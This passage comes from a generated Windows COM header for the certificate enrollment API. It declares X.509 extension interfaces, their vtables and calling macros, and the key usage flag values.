        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509Extension * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509Extension * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509Extension * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509Extension * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509Extension * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509Extension * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509Extension * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Critical )( 
            __RPC__in IX509Extension * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Critical )( 
            __RPC__in IX509Extension * This,
            /* [in] */ VARIANT_BOOL Value);
        
        END_INTERFACE
    } IX509ExtensionVtbl;

    interface IX509Extension
    {
        CONST_VTBL struct IX509ExtensionVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509Extension_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509Extension_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509Extension_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509Extension_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509Extension_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509Extension_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509Extension_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509Extension_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509Extension_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509Extension_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define IX509Extension_get_Critical(This,pValue)	\
    ( (This)->lpVtbl -> get_Critical(This,pValue) ) 

#define IX509Extension_put_Critical(This,Value)	\
    ( (This)->lpVtbl -> put_Critical(This,Value) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509Extension_INTERFACE_DEFINED__ */


#ifndef __IX509Extensions_INTERFACE_DEFINED__
#define __IX509Extensions_INTERFACE_DEFINED__

/* interface IX509Extensions */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509Extensions;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab30e-217d-11da-b2a4-000e7bbb2b09")
    IX509Extensions : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget][custom] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IX509Extension **pVal) = 0;
        
        virtual /* [helpstring][id][propget][custom] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id][custom] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt IX509Extension *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_IndexByObjectId( 
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [retval][out] */ __RPC__out LONG *pIndex) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE AddRange( 
            /* [in] */ __RPC__in_opt IX509Extensions *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509ExtensionsVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509Extensions * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509Extensions * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509Extensions * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509Extensions * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509Extensions * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509Extensions * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509Extensions * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [helpstring][id][propget][custom] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in IX509Extensions * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IX509Extension **pVal);
        
        /* [helpstring][id][propget][custom] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in IX509Extensions * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in IX509Extensions * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id][custom] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in IX509Extensions * This,
            /* [in] */ __RPC__in_opt IX509Extension *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in IX509Extensions * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in IX509Extensions * This);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_IndexByObjectId )( 
            __RPC__in IX509Extensions * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [retval][out] */ __RPC__out LONG *pIndex);
        
        HRESULT ( STDMETHODCALLTYPE *AddRange )( 
            __RPC__in IX509Extensions * This,
            /* [in] */ __RPC__in_opt IX509Extensions *pValue);
        
        END_INTERFACE
    } IX509ExtensionsVtbl;

    interface IX509Extensions
    {
        CONST_VTBL struct IX509ExtensionsVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509Extensions_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509Extensions_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509Extensions_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509Extensions_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509Extensions_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509Extensions_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509Extensions_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509Extensions_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define IX509Extensions_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define IX509Extensions_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define IX509Extensions_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define IX509Extensions_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define IX509Extensions_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#define IX509Extensions_get_IndexByObjectId(This,pObjectId,pIndex)	\
    ( (This)->lpVtbl -> get_IndexByObjectId(This,pObjectId,pIndex) ) 

#define IX509Extensions_AddRange(This,pValue)	\
    ( (This)->lpVtbl -> AddRange(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509Extensions_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0018 */
/* [local] */ 

typedef 
enum X509KeyUsageFlags
    {
        XCN_CERT_NO_KEY_USAGE	= 0,
        XCN_CERT_DIGITAL_SIGNATURE_KEY_USAGE	= 0x80,
        XCN_CERT_NON_REPUDIATION_KEY_USAGE	= 0x40,
        XCN_CERT_KEY_ENCIPHERMENT_KEY_USAGE	= 0x20,
        XCN_CERT_DATA_ENCIPHERMENT_KEY_USAGE	= 0x10,
        XCN_CERT_KEY_AGREEMENT_KEY_USAGE	= 0x8,
        XCN_CERT_KEY_CERT_SIGN_KEY_USAGE	= 0x4,
        XCN_CERT_OFFLINE_CRL_SIGN_KEY_USAGE	= 0x2,
        XCN_CERT_CRL_SIGN_KEY_USAGE	= 0x2,
        XCN_CERT_ENCIPHER_ONLY_KEY_USAGE	= 0x1,
        XCN_CERT_DECIPHER_ONLY_KEY_USAGE	= ( 0x80 << 8 ) 
    } 	X509KeyUsageFlags;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0018_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0018_v0_0_s_ifspec;

#ifndef __IX509ExtensionKeyUsage_INTERFACE_DEFINED__
#define __IX509ExtensionKeyUsage_INTERFACE_DEFINED__

/* interface IX509ExtensionKeyUsage */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509ExtensionKeyUsage;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab30f-217d-11da-b2a4-000e7bbb2b09")
    IX509ExtensionKeyUsage : public IX509Extension
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ X509KeyUsageFlags UsageFlags) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_KeyUsage( 
            /* [retval][out] */ __RPC__out X509KeyUsageFlags *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509ExtensionKeyUsageVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509ExtensionKeyUsage * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509ExtensionKeyUsage * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509ExtensionKeyUsage * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509ExtensionKeyUsage * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509ExtensionKeyUsage * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509ExtensionKeyUsage * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509ExtensionKeyUsage * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509ExtensionKeyUsage * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509ExtensionKeyUsage * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509ExtensionKeyUsage * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Critical )( 
            __RPC__in IX509ExtensionKeyUsage * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Critical )( 
            __RPC__in IX509ExtensionKeyUsage * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509ExtensionKeyUsage * This,
            /* [in] */ X509KeyUsageFlags UsageFlags);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509ExtensionKeyUsage * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_KeyUsage )( 
            __RPC__in IX509ExtensionKeyUsage * This,
            /* [retval][out] */ __RPC__out X509KeyUsageFlags *pValue);
        
        END_INTERFACE
    } IX509ExtensionKeyUsageVtbl;

    interface IX509ExtensionKeyUsage
    {
        CONST_VTBL struct IX509ExtensionKeyUsageVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509ExtensionKeyUsage_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509ExtensionKeyUsage_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509ExtensionKeyUsage_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509ExtensionKeyUsage_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509ExtensionKeyUsage_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509ExtensionKeyUsage_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509ExtensionKeyUsage_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509ExtensionKeyUsage_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509ExtensionKeyUsage_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509ExtensionKeyUsage_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define IX509ExtensionKeyUsage_get_Critical(This,pValue)	\
    ( (This)->lpVtbl -> get_Critical(This,pValue) ) 

#define IX509ExtensionKeyUsage_put_Critical(This,Value)	\
    ( (This)->lpVtbl -> put_Critical(This,Value) ) 


#define IX509ExtensionKeyUsage_InitializeEncode(This,UsageFlags)	\
    ( (This)->lpVtbl -> InitializeEncode(This,UsageFlags) ) 

#define IX509ExtensionKeyUsage_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509ExtensionKeyUsage_get_KeyUsage(This,pValue)	\
    ( (This)->lpVtbl -> get_KeyUsage(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509ExtensionKeyUsage_INTERFACE_DEFINED__ */


#ifndef __IX509ExtensionEnhancedKeyUsage_INTERFACE_DEFINED__
#define __IX509ExtensionEnhancedKeyUsage_INTERFACE_DEFINED__

/* interface IX509ExtensionEnhancedKeyUsage */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509ExtensionEnhancedKeyUsage;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab310-217d-11da-b2a4-000e7bbb2b09")
    IX509ExtensionEnhancedKeyUsage : public IX509Extension
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ __RPC__in_opt IObjectIds *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_EnhancedKeyUsage( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509ExtensionEnhancedKeyUsageVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509ExtensionEnhancedKeyUsage * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509ExtensionEnhancedKeyUsage * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509ExtensionEnhancedKeyUsage * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509ExtensionEnhancedKeyUsage * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509ExtensionEnhancedKeyUsage * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509ExtensionEnhancedKeyUsage * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509ExtensionEnhancedKeyUsage * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509ExtensionEnhancedKeyUsage * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509ExtensionEnhancedKeyUsage * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509ExtensionEnhancedKeyUsage * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Critical )( 
            __RPC__in IX509ExtensionEnhancedKeyUsage * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Critical )( 
            __RPC__in IX509ExtensionEnhancedKeyUsage * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509ExtensionEnhancedKeyUsage * This,
            /* [in] */ __RPC__in_opt IObjectIds *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509ExtensionEnhancedKeyUsage * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EnhancedKeyUsage )( 
            __RPC__in IX509ExtensionEnhancedKeyUsage * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        END_INTERFACE
    } IX509ExtensionEnhancedKeyUsageVtbl;

    interface IX509ExtensionEnhancedKeyUsage
    {
        CONST_VTBL struct IX509ExtensionEnhancedKeyUsageVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509ExtensionEnhancedKeyUsage_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509ExtensionEnhancedKeyUsage_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509ExtensionEnhancedKeyUsage_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509ExtensionEnhancedKeyUsage_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509ExtensionEnhancedKeyUsage_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509ExtensionEnhancedKeyUsage_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509ExtensionEnhancedKeyUsage_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509ExtensionEnhancedKeyUsage_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509ExtensionEnhancedKeyUsage_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509ExtensionEnhancedKeyUsage_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define IX509ExtensionEnhancedKeyUsage_get_Critical(This,pValue)	\
    ( (This)->lpVtbl -> get_Critical(This,pValue) ) 

#define IX509ExtensionEnhancedKeyUsage_put_Critical(This,Value)	\
    ( (This)->lpVtbl -> put_Critical(This,Value) ) 


#define IX509ExtensionEnhancedKeyUsage_InitializeEncode(This,pValue)	\
    ( (This)->lpVtbl -> InitializeEncode(This,pValue) ) 

#define IX509ExtensionEnhancedKeyUsage_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509ExtensionEnhancedKeyUsage_get_EnhancedKeyUsage(This,ppValue)	\
    ( (This)->lpVtbl -> get_EnhancedKeyUsage(This,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509ExtensionEnhancedKeyUsage_INTERFACE_DEFINED__ */


#ifndef __IX509ExtensionTemplateName_INTERFACE_DEFINED__
#define __IX509ExtensionTemplateName_INTERFACE_DEFINED__

/* interface IX509ExtensionTemplateName */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509ExtensionTemplateName;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab311-217d-11da-b2a4-000e7bbb2b09")
    IX509ExtensionTemplateName : public IX509Extension
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ __RPC__in BSTR strTemplateName) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_TemplateName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509ExtensionTemplateNameVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509ExtensionTemplateName * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509ExtensionTemplateName * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
